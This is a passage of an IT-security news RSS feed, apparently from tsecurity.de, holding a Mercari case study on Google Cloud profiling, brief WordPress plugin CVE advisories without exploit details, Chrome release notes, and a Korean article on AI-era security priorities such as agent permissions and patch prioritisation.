<content:encoded><![CDATA[<div class="block-paragraph"><p><i><b>Editor’s note</b>: For retailers, predicting consumers’ desires and demand is the holy grail. For retail IT, the goal is understanding the performance of your ecommerce applications. Here, Japanese online retailer Mercari shows how they used Cloud Profiler and Trace to understand a complex microservices-based application running on Google Cloud, to meet rigorous SLOs as demand shifts for their products. </i></p><p>The events of 2020 have accelerated ecommerce, increasing demand for and traffic on online marketplaces. Analyst eMarketer <a href="https://www.emarketer.com/content/us-ecommerce-will-rise-18-2020-amid-pandemic?ecid=NL1001" target="_blank">predicts</a> that ecommerce sales in the United States will grow 18% in 2020, against an overall fall in total retail sales of 10.5% for the year. Likewise, our business—Japan-headquartered consumer-to-consumer marketplace <a href="https://www.mercari.com/us/help_center/article/22" target="_blank">Mercari Inc</a>—is growing rapidly. In the United States alone, we have seen 74% year-on-year growth in monthly average users to 3.4 million. A big part of our success are our robust payment and deposit systems and AI-based fraud monitoring, which enable sellers to list items for purchase and buyers to complete transactions safely. </p><p>Mercari started as a monolithic application but as complexity grew we decided to transition to a microservices architecture. And through it all, tools like Cloud Profiler and Cloud Trace helped us track down performance problems in our code, significantly improving latency.</p><h3>A microservices menagerie</h3><p>Today, we run 80+ microservices on Google Cloud with a mix of languages including Go, Python, JavaScript and Java. To deliver this new architecture, we created a gateway-like microservice to route traffic from soon-to-be migrated monolithic service to the Google Cloud microservices, which  delivers a range of features. </p><p>After creating several microservices, we identified common requirements and created a template to accelerate their development. These common requirements included: </p><ul><li><p>Exporting metrics to Prometheus</p></li><li><p>A gRPC server and interceptors</p></li><li><p>Error Reporting, Cloud Trace and Cloud Profiler. Error Reporting counts, analyzes and aggregates crashes in running cloud services, while Cloud Trace provides a view of requests as they flow through microservices and Cloud Profiler shows how microservices consume CPU, memory and threads.  </p></li></ul><p>We then used Python to create a template for machine learning services, also expediting the creation of new microservices. This has enabled us to grow the number of microservices we use in order to address new requirements. However, as our microservices proliferated, we needed to efficiently monitor and understand their performance. </p><h3>Maintaining SLO a challenge</h3><p>In particular, we needed to monitor the impact of new versions on the production environment and the efficiency of production operations, so we could maintain our service level objective (SLO) for success rates of 99.95% and 350 milliseconds for 95% latency. </p><p>Our engineering team also uses canary deployments to detect issues with new versions of major services. However, despite applying these measures, we found it challenging to maintain our SLO when our business grew faster than expected or during unanticipated spikes in demand. Some issues can be obvious or easy to detect. For example, if a service is experiencing high CPU utilization, we could simply place or fine tune our horizontal pod autoscaler (HPA) to resolve the problem. However, other issues may be less obvious. For example, a drop in performance may not directly be tied to a specific release—it may instead be due to unexpected requests, or may arise from changes to multiple functions in a single code release. </p><h3>Using Cloud Profiler and Cloud Trace to minimize performance issues</h3><p>In particular, our business-critical UserStats service, which tracks the speed with which a user replies to a message and how fast and reliably a seller ships an item, recently started performing poorly. </p><p>New feature requirements had prompted us to track how often a seller cancels an order and provide statistics. However, while adding this new functionality, the change refactored other functions, meaning we were unable to identify the function experiencing reduced performance. Since most of our services are enabled with Cloud Profiler and Cloud Trace, we turned to these products to investigate and identify the root cause.  </p><p>Before the change:</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        <a href="https://storage.googleapis.com/gweb-cloudblog-publish/images/Using_Cloud_Profiler_and_Cloud_Trace.max-2800x2800.jpg" rel="external" target="_blank">
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Using_Cloud_Profiler_and_Cloud_Trace.max-1000x1000.jpg" alt="Using Cloud Profiler and Cloud Trace.jpg">
        
        </a>
      
        <figcaption class="article-image__caption "><i>Click to enlarge</i></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>After the change:</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        <a href="https://storage.googleapis.com/gweb-cloudblog-publish/images/Using_Cloud_Profiler_and_Cloud_Trace_2_1.max-2800x2800.jpg" rel="external" target="_blank">
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Using_Cloud_Profiler_and_Cloud_Trace_2_1.max-1000x1000.jpg" alt="Using Cloud Profiler and Cloud Trace 2 (1).jpg">
        
        </a>
      
        <figcaption class="article-image__caption "><i>Click to enlarge</i></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>These two Cloud Profiler views show the CPU time of the call stack increased from 457 milliseconds to 904 milliseconds, with most of the delta attributable to the <b>_UserStats_SellerCancelStats_Handler</b> function. But because other functions also saw variations in their CPU consumption, and because calls occurred in parallel, we found it difficult to identify the cause of latency increases. The fact that this function call was necessary meant we could not remove the entire function. </p><p>We checked Cloud Trace and confirmed the function call had increased overall latency on some requests, similar to below:</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        <a href="https://storage.googleapis.com/gweb-cloudblog-publish/images/trace_waterfall_view.max-2800x2800.jpg" rel="external" target="_blank">
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/trace_waterfall_view.max-1000x1000.jpg" alt="trace waterfall view.jpg">
        
        </a>
      
        <figcaption class="article-image__caption "><i>Click to enlarge</i></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>We analyzed the service with Cloud Profiler and identified hot spots that were contributing to the increase in CPU time consumption. We optimized these hot functions, deployed the new code, used Cloud Profiler to verify that the changes had the desired effect of reducing the CPU time. Doing so, we were able to improve latency by 10% to 15%!</p><h3>Simplifying the DevOps experience</h3><p>Before adopting Cloud Profiler, profiling production services was a tedious and manual undertaking involving recompiling with debug flags; deployment to production environments, and using disparate  tools to collect profiles and perform analysis. Containerization only increased this complexity, further reducing developer productivity. </p><p>Cloud Profiler enables us to continuously profile production environments with small and simple code changes, replacing the tedious work previously required to set up environments for performance analysis. <a href="https://cloud.google.com/profiler/docs/about-profiler#performance_impact">Low overhead</a> continuous profiling with Cloud Profiler helps us react swiftly to changes in service performance by root causing and resolving issues quickly.</p><p>Further, tools such as Cloud Trace and Cloud Profiler require minimal effort to setup and provide a consistent DevOps experience for our service owners. This is particularly important as we grow in the United States and elsewhere. Without Google Cloud, monitoring, debugging and profiling across production environments that feature a mix of languages, technology stacks, frameworks and containers would be extremely challenging and time-consuming. The release of new features and experiences in tools such as Cloud Profiler make us glad we chose Google Cloud as our primary cloud platform. We will continue to work with new features and provide feedback to Google Cloud, so it can continue to provide a better service to users.  </p><p><i>Visit the Google Cloud website to learn more about <a href="https://cloud.google.com/profiler">Cloud Profiler</a> and <a href="https://cloud.google.com/trace">Cloud Trace</a>.</i></p></div>
<div class="block-related_article_tout">





<div class="uni-related-article-tout h-c-page">
  <section class="h-c-grid">
    <a href="https://cloud.google.com/blog/topics/customers/mercari-relies-on-google-cloud-premium-support-and-technical-account-management/" data-analytics='{
                       "event": "page interaction",
                       "category": "article lead",
                       "action": "related article - inline",
                       "label": "article: {slug}"
                     }' class="uni-related-article-tout__wrapper h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
        h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3 uni-click-tracker">
      <div class="uni-related-article-tout__inner-wrapper">
        <p class="uni-related-article-tout__eyebrow h-c-eyebrow">Related Article</p>

        <div class="uni-related-article-tout__content-wrapper">
          <div class="uni-related-article-tout__image-wrapper">
            <div class="uni-related-article-tout__image"></div>
          </div>
          <div class="uni-related-article-tout__content">
            <h4 class="uni-related-article-tout__header h-has-bottom-margin">Mercari: Faster and more efficient development with the help of Google Cloud</h4>
            <p class="uni-related-article-tout__body">Technical implementation can be challenging, and many businesses can benefit from hands-on support from their cloud provider. Learn how w...</p>
            <div class="cta module-cta h-c-copy  uni-related-article-tout__cta muted">
              <span class="nowrap">Read Article
                <svg class="icon h-c-icon" role="presentation">
                  <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#mi-arrow-forward"></use>
                </svg>
              </span>
            </div>
          </div>
        </div>
      </div>
    </a>
  </section>
</div>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-10865 | stylemix Cost Calculator Builder Plugin up to 4.0.11 on WordPress Global Settings template body client_secret/secret key missing encryption (EUVD-2026-43152)]]></title>
<description><![CDATA[A vulnerability identified as problematic has been detected in stylemix Cost Calculator Builder Plugin up to 4.0.11 on WordPress. The affected element is an unknown function of the file template body of the component Global Settings. Performing a manipulation of the argument client_secret/secret ...]]></description>
<link>https://tsecurity.de/de/3662618/sicherheitsluecken/cve-2026-10865-stylemix-cost-calculator-builder-plugin-up-to-4011-on-wordpress-global-settings-template-body-clientsecretsecret-key-missing-encryption-euvd-2026-43152/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662618/sicherheitsluecken/cve-2026-10865-stylemix-cost-calculator-builder-plugin-up-to-4011-on-wordpress-global-settings-template-body-clientsecretsecret-key-missing-encryption-euvd-2026-43152/</guid>
<pubDate>Sun, 12 Jul 2026 03:55:05 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">problematic</a> has been detected in <a href="https://vuldb.com/product/stylemix:cost_calculator_builder_plugin">stylemix Cost Calculator Builder Plugin up to 4.0.11</a> on WordPress. The affected element is an unknown function of the file <em>template body</em> of the component <em>Global Settings</em>. Performing a manipulation of the argument <em>client_secret/secret key</em> results in missing encryption of sensitive data.

This vulnerability is reported as <a href="https://vuldb.com/cve/CVE-2026-10865">CVE-2026-10865</a>. The attack is possible to be carried out remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-13250 | solacewp Starter Template feature up to 1.5.3 on WordPress Authorization /wp-admin/profile.php wp_ajax_nopriv_ nonce authorization (EUVD-2026-43141)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, has been found in solacewp Starter Template feature up to 1.5.3 on WordPress. The affected element is the function wp_ajax_nopriv_ of the file /wp-admin/profile.php of the component Authorization. The manipulation of the argument nonce leads to a...]]></description>
<link>https://tsecurity.de/de/3661383/sicherheitsluecken/cve-2026-13250-solacewp-starter-template-feature-up-to-153-on-wordpress-authorization-wp-adminprofilephp-wpajaxnopriv-nonce-authorization-euvd-2026-43141/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661383/sicherheitsluecken/cve-2026-13250-solacewp-starter-template-feature-up-to-153-on-wordpress-authorization-wp-adminprofilephp-wpajaxnopriv-nonce-authorization-euvd-2026-43141/</guid>
<pubDate>Sat, 11 Jul 2026 08:38:43 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, has been found in <a href="https://vuldb.com/product/solacewp:starter_template_feature">solacewp Starter Template feature up to 1.5.3</a> on WordPress. The affected element is the function <code>wp_ajax_nopriv_</code> of the file <em>/wp-admin/profile.php</em> of the component <em>Authorization</em>. The manipulation of the argument <em>nonce</em> leads to authorization bypass.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2026-13250">CVE-2026-13250</a>. Remote exploitation of the attack is possible. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-12141 | leap13 Premium Addons for Elementor Plugin up to 4.11.84 on WordPress Template Rendering /section/print_template premium_tooltip_text cross site scripting (EUVD-2026-43142)]]></title>
<description><![CDATA[A vulnerability was found in leap13 Premium Addons for Elementor Plugin up to 4.11.84 on WordPress. It has been rated as problematic. Affected by this issue is the function print_template of the file /section/print_template of the component Template Rendering. The manipulation of the argument pre...]]></description>
<link>https://tsecurity.de/de/3661382/sicherheitsluecken/cve-2026-12141-leap13-premium-addons-for-elementor-plugin-up-to-41184-on-wordpress-template-rendering-sectionprinttemplate-premiumtooltiptext-cross-site-scripting-euvd-2026-43142/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661382/sicherheitsluecken/cve-2026-12141-leap13-premium-addons-for-elementor-plugin-up-to-41184-on-wordpress-template-rendering-sectionprinttemplate-premiumtooltiptext-cross-site-scripting-euvd-2026-43142/</guid>
<pubDate>Sat, 11 Jul 2026 08:38:42 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/leap13:premium_addons_for_elementor_plugin">leap13 Premium Addons for Elementor Plugin up to 4.11.84</a> on WordPress. It has been rated as <a href="https://vuldb.com/kb/risk">problematic</a>. Affected by this issue is the function <code>print_template</code> of the file <em>/section/print_template</em> of the component <em>Template Rendering</em>. The manipulation of the argument <em>premium_tooltip_text</em> leads to cross site scripting.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2026-12141">CVE-2026-12141</a>. The attack can be initiated remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Soft Skills for the Job Market: Applying for Jobs]]></title>
<description><![CDATA[Author: The Cyber Mentor - Bewertung: 3x - Views:23 https://www.tcm.rocks/ss-y - Find the full and FREE Soft Skills for the Job Market course in the TCM Security Academy. 

https://www.tcm.rocks/acad-summer-y - We're hosting our Summer Sale! Up until July 15th, grab 50% off your first payment to ...]]></description>
<link>https://tsecurity.de/de/3660321/it-security-video/soft-skills-for-the-job-market-applying-for-jobs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660321/it-security-video/soft-skills-for-the-job-market-applying-for-jobs/</guid>
<pubDate>Fri, 10 Jul 2026 18:06:55 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: The Cyber Mentor - Bewertung: 3x - Views:23 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/wDpIQfbusSc?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>https://www.tcm.rocks/ss-y - Find the full and FREE Soft Skills for the Job Market course in the TCM Security Academy. <br />
<br />
https://www.tcm.rocks/acad-summer-y - We're hosting our Summer Sale! Up until July 15th, grab 50% off your first payment to the TCM Security Academy (use the code CAMPTCM to redeem) and 20% off certifications and live trainings. <br />
<br />
We're releasing our Soft Skills for the Job Market course all FREE on YouTube! This course can also be found in the TCM Security Academy. <br />
<br />
Module Three of the Soft Skills course focuses on applying for jobs. We know that this process can be tedious, but hopefully the points made in this module will help you out while sending out applications, researching potential employers, and overall putting your best foot forward. You've got this!<br />
<br />
Get a copy of the TCM Security resume template to help you in your job searching journey: https://www.tcm.rocks/resume-template <br />
<br />
More modules will be dripped out in the near future! Stay tuned.<br />
<br />
Watch the other modules: https://www.tcm.rocks/soft-skills-playlist<br />
<br />
#freecourse #jobsearch #applicationletter #cybersecuritycareers #cybersecurity <br />
<br />
Sponsor a Video: https://www.tcm.rocks/Sponsors<br />
Pentests & Security Consulting: https://tcm-sec.com<br />
Get Trained: https://www.tcm.rocks/acad-y<br />
Get Certified: http://www.tcm.rocks/certs-y<br />
Merch: https://www.bonfire.com/store/tcm-security/<br />
<br />
📱Social Media📱<br />
___________________________________________<br />
X: https://x.com/TCMSecurity<br />
Twitch: https://www.twitch.tv/thecybermentor<br />
Instagram: https://www.instagram.com/tcmsecurity/<br />
LinkedIn: https://www.linkedin.com/company/tcm-security-inc/<br />
TikTok: https://www.tiktok.com/@tcmsecurity<br />
Discord: https://discord.gg/tcm<br />
Facebook: https://www.facebook.com/tcmsecure<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Dev for Android Update]]></title>
<description><![CDATA[Hi everyone! We've just released Chrome Dev 152 (152.0.7940.2) for Android. It's now available on Google Play.You can see a partial list of the changes in the Git log. For details on new features, check out the Chromium blog, and for details on web platform updates, check here.If you find a new i...]]></description>
<link>https://tsecurity.de/de/3659881/it-security-nachrichten/chrome-dev-for-android-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659881/it-security-nachrichten/chrome-dev-for-android-update/</guid>
<pubDate>Fri, 10 Jul 2026 15:38:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hi everyone! We've just released Chrome Dev 152 (152.0.7940.2) for Android. It's now available on <a href="https://play.google.com/store/apps/details?id=com.chrome.dev">Google Play</a>.</p><p>You can see a partial list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/152.0.7924.0..152.0.7940.2?pretty=fuller&amp;n=10000">Git log</a>. For details on new features, check out the <a href="https://blog.chromium.org/">Chromium blog</a>, and for details on web platform updates, check <a href="https://www.chromestatus.com/features#milestone%3D152">here</a>.</p><p>If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=Android%20Issue">filing a bug</a>.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[After Apple, India’s smartphone manufacturing boom enters new phase with Vivo JV]]></title>
<description><![CDATA[Vivo's joint venture could become a template for Chinese smartphone makers in India.]]></description>
<link>https://tsecurity.de/de/3658701/it-nachrichten/after-apple-indias-smartphone-manufacturing-boom-enters-new-phase-with-vivo-jv/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658701/it-nachrichten/after-apple-indias-smartphone-manufacturing-boom-enters-new-phase-with-vivo-jv/</guid>
<pubDate>Fri, 10 Jul 2026 06:46:57 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Vivo's joint venture could become a template for Chinese smartphone makers in India.]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Beta for iOS Update]]></title>
<description><![CDATA[Hi everyone! We've just released Chrome Beta 151 (151.0.7922.17) for iOS; it'll become available on App Store in the next few days.You can see a partial list of the changes in the Git log. If you find a new issue, please let us know by filing a bug.Chrome Release TeamGoogle Chrome]]></description>
<link>https://tsecurity.de/de/3657513/it-security-nachrichten/chrome-beta-for-ios-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657513/it-security-nachrichten/chrome-beta-for-ios-update/</guid>
<pubDate>Thu, 09 Jul 2026 17:22:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hi everyone! We've just released Chrome Beta 151 (151.0.7922.17) for iOS; it'll become available on App Store in the next few days.</p><p>You can see a partial list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/151.0.7922.3..151.0.7922.17?pretty=fuller&amp;n=10000">Git log</a>. If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=iOS%20Issue">filing a bug</a>.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Beta for Android Update]]></title>
<description><![CDATA[Hi everyone! We've just released Chrome Beta 151 (151.0.7922.18) for Android. It's now available on Google Play.You can see a partial list of the changes in the Git log. For details on new features, check out the Chromium blog, and for details on web platform updates, check here.If you find a new...]]></description>
<link>https://tsecurity.de/de/3657512/it-security-nachrichten/chrome-beta-for-android-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657512/it-security-nachrichten/chrome-beta-for-android-update/</guid>
<pubDate>Thu, 09 Jul 2026 17:22:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hi everyone! We've just released Chrome Beta 151 (151.0.7922.18) for Android. It's now available on <a href="https://play.google.com/store/apps/details?id=com.chrome.beta">Google Play</a>.</p><p>You can see a partial list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/151.0.7922.6..151.0.7922.18?pretty=fuller&amp;n=10000">Git log</a>. For details on new features, check out the <a href="https://blog.chromium.org/">Chromium blog</a>, and for details on web platform updates, check <a href="https://www.chromestatus.com/features#milestone%3D151">here</a>.</p><p>If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=Android%20Issue">filing a bug</a>.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chinese-Funded Interpol Cybercrime Crackdown Leads to 5,800 Arrests]]></title>
<description><![CDATA[Operation First Light 2026, coordinated by Interpol and funded by the Chinese government, has led to 5,811 arrests This article has been indexed from www.infosecurity-magazine.com Read the original article: Chinese-Funded Interpol Cybercrime Crackdown Leads to 5,800 Arrests
Read more →
The post C...]]></description>
<link>https://tsecurity.de/de/3657035/it-security-nachrichten/chinese-funded-interpol-cybercrime-crackdown-leads-to-5800-arrests/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657035/it-security-nachrichten/chinese-funded-interpol-cybercrime-crackdown-leads-to-5800-arrests/</guid>
<pubDate>Thu, 09 Jul 2026 14:38:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Operation First Light 2026, coordinated by Interpol and funded by the Chinese government, has led to 5,811 arrests This article has been indexed from www.infosecurity-magazine.com Read the original article: Chinese-Funded Interpol Cybercrime Crackdown Leads to 5,800 Arrests</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/chinese-funded-interpol-cybercrime-crackdown-leads-to-5800-arrests/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/chinese-funded-interpol-cybercrime-crackdown-leads-to-5800-arrests/">Chinese-Funded Interpol Cybercrime Crackdown Leads to 5,800 Arrests</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI 시대 보안, 무엇부터 해야 하나…화이트해커 박찬암 대표가 짚은 핵심 과제]]></title>
<description><![CDATA[8일 과학기술정보통신부와 한국인터넷진흥원(KISA) 등 정부 기관이 주최·주관한 제15회 정보보호의 날 행사에서 열린 세미나에 연사로 나선 박찬암 스틸리언 대표는 ‘주요 AI 위협과 보안 우선순위’를 주제로 AI 시대 보안 환경의 변화와 정보보호 조직의 우선 대응 과제를 설명했다. 그는 “AI는 새로운 기술이지만 보안의 핵심은 결국 권한 관리와 공급망 관리, 그리고 사람의 검증”이라고 설명했다.



박 대표가 먼저 강조한 부분은 AI가 해커의 공격 속도를 근본적으로 바꾸고 있다는 점이다. 과거에는 기업 내부망에 침투하기 위해...]]></description>
<link>https://tsecurity.de/de/3656185/it-nachrichten/ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656185/it-nachrichten/ai/</guid>
<pubDate>Thu, 09 Jul 2026 09:02:33 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>8일 과학기술정보통신부와 한국인터넷진흥원(KISA) 등 정부 기관이 주최·주관한 제15회 <a href="https://www.kisa.or.kr/401/form?postSeq=3697" target="_blank" rel="nofollow">정보보호의 날 행사</a>에서 열린 세미나에 연사로 나선 <a href="https://www.linkedin.com/in/chanampark/" target="_blank" rel="nofollow">박찬암 </a>스틸리언 대표는 ‘주요 AI 위협과 보안 우선순위’를 주제로 AI 시대 보안 환경의 변화와 정보보호 조직의 우선 대응 과제를 설명했다. 그는 “AI는 새로운 기술이지만 보안의 핵심은 결국 권한 관리와 공급망 관리, 그리고 사람의 검증”이라고 설명했다.</p>



<p>박 대표가 먼저 강조한 부분은 AI가 해커의 공격 속도를 근본적으로 바꾸고 있다는 점이다. 과거에는 기업 내부망에 침투하기 위해 문서 편집기나 메신저 등 다양한 소프트웨어를 분석하고 취약점을 찾는 데 상당한 시간이 필요했으나 이제 AI를 활용하면서 이러한 작업이 크게 빨라졌다는 것이다.</p>



<p>박 대표는 “예전에는 취약점을 찾기 위해 최소 4주 정도가 걸렸지만 지금은 하루도 채 걸리지 않는다”며 “AI 시대에는 기업 내부에 설치된 모든 소프트웨어가 훨씬 중요한 공격 대상이 된다”고 설명했다.</p>



<p>그는 이어 보안 업계가 가장 먼저 점검해야 할 영역으로 내부 소프트웨어와 공급망 보안을 꼽았다. 박 대표는 “고객사에서는 ‘벤더가 만든 제품 아니냐’는 반응이 자주 나온다”면서도 “회사 시스템에 설치된 순간부터 그 소프트웨어는 더 이상 벤더의 문제가 아니라 기업 시스템의 일부”라고 강조했다. 결국 서드파티 소프트웨어의 취약점 역시 기업 보안 조직이 직접 관리해야 할 영역이라는 의미다.</p>



<p>이와 관련해 그는 국가정보원이 지난 5월 1일 발표한 <a href="https://www.ncsc.go.kr:4018/template/resources/file/nis_guide_lines_2023_1_31.pdf" target="_blank" rel="nofollow">국가 사이버보안 기본지침</a>도 소개했다. 해당 지침은 소프트웨어 도입 시 제조사에 취약점 시정과 기술 지원을 요구할 수 있는 권한을 명시하고 있는데, 이는 반대로 운영 기관의 책임 역시 그만큼 커졌다는 의미라고 해석했다. 그는 “이제는 서드파티 문제를 벤더 책임으로만 돌릴 수 없는 시대”라고 말했다.</p>



<p>다음으로는 AI 에이전트 시대의 권한 관리를 핵심 과제로 제시했다. 최근 기업들은 MCP(Model Context Protocol) 기반 AI 에이전트를 활용해 메일을 읽고 문서를 분석하며 내부 시스템과 다양한 업무를 연결하고 있다. 하지만 AI 에이전트가 처리하는 업무가 많아질수록 권한 관리가 새로운 보안 리스크가 된다는 것이 박 대표의 설명이다.</p>



<p>그는 AI 에이전트가 외부 문서를 읽고 내부 시스템과 연동하는 모든 단계가 잠재적인 공격 경로가 될 수 있다고 설명했다. 악성 문서를 통한 프롬프트 오염, 과도한 권한을 가진 에이전트를 이용한 내부 정보 유출 등도 충분히 현실적인 시나리오라고 진단했다. 특히 그는 퇴사자나 외주 인력에게 남아 있는 잔여 권한처럼 과거에는 작은 문제로 끝났던 사안들도, AI가 이러한 요소들을 자동으로 엮어내면서 큰 사고로 확대될 수 있다고 지적했다.</p>



<p>박 대표는 “AI를 도입할 때는 기능보다 권한을 먼저 설계해야 한다”며 “MCP 전체 프로세스를 하나의 공격 경로라고 생각하고 접근해야 한다”고 말했다.</p>



<p>로컬 AI 테스트 환경도 정보보호 리더가 놓치기 쉬운 사각지대로 언급됐다. 최근 기업에서는 라마(LLaMA) 계열 모델 등 다양한 오픈소스 AI를 개인 PC나 업무용 PC에 설치해 검증하는 사례가 빠르게 늘고 있다. 하지만 이러한 과정에서 서버나 포트가 개방되는 경우가 적지 않으며, 이 지점에서 취약점이 발견되면 곧바로 침투 경로가 될 수 있다는 설명이다.</p>



<p>박 대표는 “2024년 원격 코드 실행(Remote Code Execution) 취약점이 발견됐을 당시 인터넷에 노출된 서버가 <a href="https://www.csoonline.com/article/2503268/ollama-patches-critical-vulnerability-in-open-source-ai-framework.html" target="_blank">1,000대 이상</a>이었는데, 2026년 최근에는 동일한 대상에서 <a href="https://www.csoonline.com/article/4168584/ollama-vulnerability-highlights-danger-of-ai-frameworks-with-unrestricted-access.html" target="_blank">30만 대 이상</a>이 노출된 상태로 확인됐며 “AI를 테스트하는 행위 자체도 새로운 보안 위험이 될 수 있다”고 말했다.</p>



<p>이어 그는 보안 운영 방식도 바뀌어야 한다고 강조했다. AI를 활용한 공격이 늘면서 보안 담당자가 처리해야 하는 경고(Alert)가 과거보다 10배, 많게는 100배까지 증가해 모든 취약점을 동일한 기준으로 대응하는 것이 사실상 불가능해졌기 때문이다.</p>



<p>이 같은 상황에 대한 해법으로 박 대표는 취약점 심각도를 나타내는 CVSS(Common Vulnerability Scoring System)만으로는 우선순위를 결정하기에 부족하다고 진단했다. 대신 실제 악용 가능성을 예측하는 EPSS(Exploit Prediction Scoring System), 미국 정부의 KEV(Known Exploited Vulnerabilities) 목록 등을 함께 활용해 취약점 대응 우선순위를 정해야 한다고 제안했다.</p>



<p>예를 들어 CVSS 점수가 7.5점이라면 크리티컬 등급까지는 아니어서 우선순위에서 밀리기 쉽다. 그러나 동일한 취약점이 KEV 목록에 등재돼 있고 실제 랜섬웨어 공격에 악용된 사례가 있으며, EPSS 기준 공격 발생 확률이 두 달 사이 1%에서 90%까지 급등했다면 대응 우선순위는 완전히 달라진다는 설명이다. 그는 “이런 요소를 함께 봐야 실제로 먼저 패치해야 할 취약점을 가려낼 수 있다”고 말했다.</p>



<p>박 대표는 “AI 슬롭(AI Slop)으로 불리는 방대한 노이즈 속에서 무엇을 먼저 패치할지 결정하는 기준 자체가 이제는 보안 담당자의 핵심 역량이 된다”고 강조했다.</p>



